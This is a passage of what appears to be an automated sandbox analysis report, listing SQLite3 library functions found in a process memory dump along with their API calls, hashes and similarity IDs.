                                                    • API ID: sqlite3_free$sqlite3_malloc64sqlite3_mprintf$sqlite3_snprintf$sqlite3_mutex_entersqlite3_mutex_leavesqlite3_strnicmp
                                                    • String ID: .$sqlite3_extension_init$te3_
                                                    • API String ID: 2803375525-613441610
                                                    • Opcode ID: dd30ae0b44b0cf241bd017b82f5e3f4b817ab8a0f18b2834f83d5a156b8f96a2
                                                    • Instruction ID: 06cee12e98cafdaef094aa7407314bfde79e55d119778efc34b8172e34858d01
                                                    • Opcode Fuzzy Hash: dd30ae0b44b0cf241bd017b82f5e3f4b817ab8a0f18b2834f83d5a156b8f96a2
                                                    • Instruction Fuzzy Hash: 18C1E7B4A087559FDB00DF69C48469EBBF1BF88318F25C929E8989B350D734D941CF92
                                                    Function 61E24C20 Relevance: 28.6, APIs: 19, Instructions: 132COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • sqlite3_stricmp.SQLITE3 ref: 61E24C3A
                                                    • sqlite3_value_numeric_type.SQLITE3 ref: 61E24C46
                                                    • sqlite3_value_int.SQLITE3 ref: 61E24C53
                                                    • sqlite3_stricmp.SQLITE3 ref: 61E24C7B
                                                    • sqlite3_value_numeric_type.SQLITE3 ref: 61E24C87
                                                    • sqlite3_value_int.SQLITE3 ref: 61E24C96
                                                    • sqlite3_stricmp.SQLITE3 ref: 61E24CB6
                                                    • sqlite3_value_numeric_type.SQLITE3 ref: 61E24CC2
                                                    • sqlite3_value_int.SQLITE3 ref: 61E24CD1
                                                    • sqlite3_stricmp.SQLITE3 ref: 61E24CFD
                                                    • sqlite3_value_numeric_type.SQLITE3 ref: 61E24D09
                                                    • sqlite3_value_int.SQLITE3 ref: 61E24D17
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_stricmpsqlite3_value_intsqlite3_value_numeric_type
                                                    • String ID:
                                                    • API String ID: 2723203140-0
                                                    • Opcode ID: 0ca5c5d7c75c8d46d1d0a7c1e437178b530c3527eb26bc30356c70dfd12e0b9b
                                                    • Instruction ID: f4d03218b954966bda3f34bff198905b294d1d14d0796639f494b9cc0f561a75
                                                    • Opcode Fuzzy Hash: 0ca5c5d7c75c8d46d1d0a7c1e437178b530c3527eb26bc30356c70dfd12e0b9b
                                                    • Instruction Fuzzy Hash: 8F41F6B0608B468AC305AF65C99165EBBF1BFC434CF75CE2EC8958B350E739D8919B42
                                                    Function 61E357C2 Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 342COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: memcmp$sqlite3_mprintf$sqlite3_malloc64$sqlite3_freesqlite3_vfs_find
                                                    • String ID: @$access$cache
                                                    • API String ID: 1538829708-1361544076
                                                    • Opcode ID: 1c28c90d1831b6ad3e80e3b9e627978afb1c0c80aa185386d0e77e5d1ae255d4
                                                    • Instruction ID: 21ad0e45d631a2c2f9aeebf40f265e80b76eb728aad9cf8931759efcab591dbc
                                                    • Opcode Fuzzy Hash: 1c28c90d1831b6ad3e80e3b9e627978afb1c0c80aa185386d0e77e5d1ae255d4
                                                    • Instruction Fuzzy Hash: 8CD15E709083658FDB118FA8C4803AEBBF5AFCA318F68C46ED895AB351D335D446DB52
                                                    Function 61E395A4 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 310COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • sqlite3_free.SQLITE3 ref: 61E395FD
                                                      • Part of subcall function 61E09B91: sqlite3_mutex_enter.SQLITE3 ref: 61E09BB0
                                                    • sqlite3_snprintf.SQLITE3 ref: 61E39629
                                                    • sqlite3_free.SQLITE3 ref: 61E3965C
                                                    • sqlite3_mutex_enter.SQLITE3 ref: 61E3967C
                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E39692
                                                    • sqlite3_mutex_enter.SQLITE3 ref: 61E396A6
                                                    • sqlite3_realloc64.SQLITE3 ref: 61E39789
                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E398B0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_mutex_enter$sqlite3_freesqlite3_mutex_leave$sqlite3_realloc64sqlite3_snprintf
                                                    • String ID: winOpenShm$winShmMap1$winShmMap2$winShmMap3
                                                    • API String ID: 424382227-1629717226
                                                    • Opcode ID: bc001d11ef045672849579530d998e397025a7d30bcfae3080b291363083ef89
                                                    • Instruction ID: d11ebc3dcc47e6cd33e973e0e9579bb22dbe22f382b668537ce984c2e03aeb57
                                                    • Opcode Fuzzy Hash: bc001d11ef045672849579530d998e397025a7d30bcfae3080b291363083ef89
                                                    • Instruction Fuzzy Hash: D6D113B4A08752CFDB00DF69C48065ABBF1BF89358F25C86DE8889B354DB35D845CB92
                                                    Function 61E37E1F Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 98COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_result_error$sqlite3_value_bytes$sqlite3_db_configsqlite3_freesqlite3_mprintfsqlite3_result_blobsqlite3_value_blobsqlite3_value_text
                                                    • String ID: out of memory
                                                    • API String ID: 2048698484-2599737071
                                                    • Opcode ID: 58418c79be000a13f7557e39a7959b66ee966b4ed69db67a998b47f69df1e70b
                                                    • Instruction ID: 732aa0b1555792cd0f40343f184ced652c5c1ad470ef53a03935a3f2a088fb1d
                                                    • Opcode Fuzzy Hash: 58418c79be000a13f7557e39a7959b66ee966b4ed69db67a998b47f69df1e70b
                                                    • Instruction Fuzzy Hash: DF4193B4909766DBC710AF69C48465DBBF0BF89764F21CA1DE8A89B390D334D881CF52
                                                    Function 61E3751B Relevance: 18.4, APIs: 12, Instructions: 369COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_value_text$sqlite3_value_int$sqlite3_mallocsqlite3_result_error
                                                    • String ID:
                                                    • API String ID: 3802728871-0
                                                    • Opcode ID: efb69bd8074eed61715a8ea6351c35d197c48b6daca6edd2f60631f30aece9ea
                                                    • Instruction ID: 66a0afb184cb1f036ebb7fb7bb074d62e5ad442047e640b865ca154a233d0956
                                                    • Opcode Fuzzy Hash: efb69bd8074eed61715a8ea6351c35d197c48b6daca6edd2f60631f30aece9ea
                                                    • Instruction Fuzzy Hash: 77128E74D04329DFDB60DF68C984B8DBBF1BB88314F1085AAE998A7340E7349A85CF01
                                                    Function 61E36F4B Relevance: 17.7, APIs: 4, Strings: 6, Instructions: 216COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • sqlite3_mprintf.SQLITE3 ref: 61E36F64
                                                      • Part of subcall function 61E3579B: sqlite3_initialize.SQLITE3 ref: 61E357A1
                                                      • Part of subcall function 61E3579B: sqlite3_vmprintf.SQLITE3 ref: 61E357BB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_initializesqlite3_mprintfsqlite3_vmprintf
                                                    • String ID: + $ AND $ NOT $ OR $"$(,)?
                                                    • API String ID: 2841607023-3708749232
                                                    • Opcode ID: 3dc145415827c46375544632d64da83e32d07bfc6996ff04c81ee762814bcafc
                                                    • Instruction ID: 67c0e6f688afe049bc0bd5c99cd1f37295a6981cad68107400e6549990eada02
                                                    • Opcode Fuzzy Hash: 3dc145415827c46375544632d64da83e32d07bfc6996ff04c81ee762814bcafc
                                                    • Instruction Fuzzy Hash: B59149B5E08266CFDB11CFA8C48069AFBF1BF89314F25C5A9D894AB351D374D841CBA1
                                                    Function 61E25E11 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 168COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_snprintf$sqlite3_result_textsqlite3_result_value
                                                    • String ID: NULL
                                                    • API String ID: 336169149-324932091
                                                    • Opcode ID: 63035dac4f96d1bb80cd73cdb533cadc555623b5f5bc5f0300cfff130f29f961
                                                    • Instruction ID: 0b6898894d041e9d19db71ef6033f8d6bcb45ddca593b5b630c1b9fe67082778
                                                    • Opcode Fuzzy Hash: 63035dac4f96d1bb80cd73cdb533cadc555623b5f5bc5f0300cfff130f29f961
                                                    • Instruction Fuzzy Hash: 986191705083868FD7119F68C5A4B9ABFF2AF89314F28CA5DD4C88B395D739C845CB42
                                                    Function 61E1DA59 Relevance: 16.9, APIs: 3, Strings: 8, Instructions: 358stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: strncmp
                                                    • String ID: -$-$0$]$false$null$true$}
                                                    • API String ID: 1114863663-1443276563
                                                    • Opcode ID: 60f056452a07dd69d569e7422431dd27ed235a79a6ab2a8e599c1708af961d9b
                                                    • Instruction ID: 93ab420c9c69ecb634fb86b2094d29de9a7b2d1480264f5dd4a69f45d190dd3b
                                                    • Opcode Fuzzy Hash: 60f056452a07dd69d569e7422431dd27ed235a79a6ab2a8e599c1708af961d9b
                                                    • Instruction Fuzzy Hash: 54D1E178A0C2464EEB15CFA8C49A7EABBF1BF45308F68C65AD4958738EC339D446C701
                                                    Function 61E3830D Relevance: 16.7, APIs: 11, Instructions: 192COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 61E0A189: sqlite3_free.SQLITE3 ref: 61E0A198
                                                      • Part of subcall function 61E0A189: sqlite3_free.SQLITE3 ref: 61E0A1A3
                                                    • sqlite3_value_text.SQLITE3 ref: 61E3833A
                                                    • sqlite3_value_bytes.SQLITE3 ref: 61E3834D
                                                    • sqlite3_malloc64.SQLITE3 ref: 61E38362
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_free$sqlite3_malloc64sqlite3_value_bytessqlite3_value_text
                                                    • String ID:
                                                    • API String ID: 3723316075-0
                                                    • Opcode ID: 2289b546ea19ac45977341610254b224ec78ea57a54cf2e6bfd4a02c42304627
                                                    • Instruction ID: 4718e35c64af05013497ab148a38cbf99aa608c08a383500cc57ab354ef58589
                                                    • Opcode Fuzzy Hash: 2289b546ea19ac45977341610254b224ec78ea57a54cf2e6bfd4a02c42304627
                                                    • Instruction Fuzzy Hash: 737135B09042558FDB00CF69C484B9ABBF0BF88318F25C5ADD859CB369E738D885CB91
                                                    Function 61E33888 Relevance: 16.7, APIs: 11, Instructions: 175COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_value_bytessqlite3_value_text$memcmpsqlite3_result_error_toobig
                                                    • String ID:
                                                    • API String ID: 3428878466-0
                                                    • Opcode ID: 48a8e361665ce52a7e02b3dd367f3043eb564be8f1ba6dead23184c5433a1418
                                                    • Instruction ID: 18481baacc06119b3b195b6085c61c3cbdf7fdec467d95e9756de9e44cabca61
                                                    • Opcode Fuzzy Hash: 48a8e361665ce52a7e02b3dd367f3043eb564be8f1ba6dead23184c5433a1418
                                                    • Instruction Fuzzy Hash: 8B71E074E042599FCB00DFA9D89099DBBF1BF88314F24856AE898EB344E735E842CF51
                                                    Function 61E0C4BB Relevance: 16.6, APIs: 11, Instructions: 54COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_free
                                                    • String ID:
                                                    • API String ID: 2313487548-0
                                                    • Opcode ID: cc8bbecdeb9c1dfda9548ace6e0444fd38f1078339e74ce32c513f6c2a7c387e
                                                    • Instruction ID: 9b2825bae4ba0860af8edb1d6e48429170ab63dde003ac776ee4b90c104cb99e
                                                    • Opcode Fuzzy Hash: cc8bbecdeb9c1dfda9548ace6e0444fd38f1078339e74ce32c513f6c2a7c387e
                                                    • Instruction Fuzzy Hash: 16114774618A428BCB40AF7CC0C5419BBE4EF48325B928D9DDCC98B305D734D8A09F55
                                                    Function 61E33FBF Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 341COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: false$null$true
                                                    • API String ID: 0-2913297407
                                                    • Opcode ID: 013e77ef330872d3753c596d24955f84aeb7c7ae209a98e1e7b49357f95f8730
                                                    • Instruction ID: 883827580cc2300222aa5dbca6048ac52e07b449fcadbd2754e0d408770ed413
                                                    • Opcode Fuzzy Hash: 013e77ef330872d3753c596d24955f84aeb7c7ae209a98e1e7b49357f95f8730
                                                    • Instruction Fuzzy Hash: 65C19171A492658BDB01DE98C48079DFBF2ABCA318F68C16BD9845B346C33AD846CB51
                                                    Function 61E6F96C Relevance: 15.1, APIs: 10, Instructions: 121COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • sqlite3_malloc64.SQLITE3 ref: 61E6F9E3
                                                    • sqlite3_exec.SQLITE3 ref: 61E6FA16
                                                    • sqlite3_free_table.SQLITE3 ref: 61E6FA30
                                                    • sqlite3_free.SQLITE3 ref: 61E6FA44
                                                    • sqlite3_mprintf.SQLITE3 ref: 61E6FA57
                                                    • sqlite3_free.SQLITE3 ref: 61E6FA64
                                                    • sqlite3_free.SQLITE3 ref: 61E6FA7D
                                                      • Part of subcall function 61E09B91: sqlite3_mutex_enter.SQLITE3 ref: 61E09BB0
                                                    • sqlite3_free_table.SQLITE3 ref: 61E6FA92
                                                      • Part of subcall function 61E09CF9: sqlite3_free.SQLITE3 ref: 61E09D27
                                                    • sqlite3_realloc64.SQLITE3 ref: 61E6FAB6
                                                    • sqlite3_free_table.SQLITE3 ref: 61E6FAC8
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_free$sqlite3_free_table$sqlite3_execsqlite3_malloc64sqlite3_mprintfsqlite3_mutex_entersqlite3_realloc64
                                                    • String ID:
                                                    • API String ID: 3621699333-0
                                                    • Opcode ID: b013ad4d6e113143998e75fc7dfd0212ade2f70e69038f9a63e37e221b335d5d
                                                    • Instruction ID: f7205ab39d2cd4673e2b4870868ff10ca3bba8569493306b060396cb2e7148c4
                                                    • Opcode Fuzzy Hash: b013ad4d6e113143998e75fc7dfd0212ade2f70e69038f9a63e37e221b335d5d
                                                    • Instruction Fuzzy Hash: B351D4B0945249DBEB00CFA8D59479EBBF5BF84308F608829E894AB340D779D850CF91
                                                    Function 61E75EFD Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 115COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • sqlite3_step.SQLITE3(?,?,?,?,?,?,?,00000000,00000000,?,61E76430), ref: 61E75F3C
                                                    • sqlite3_finalize.SQLITE3 ref: 61E75FBC
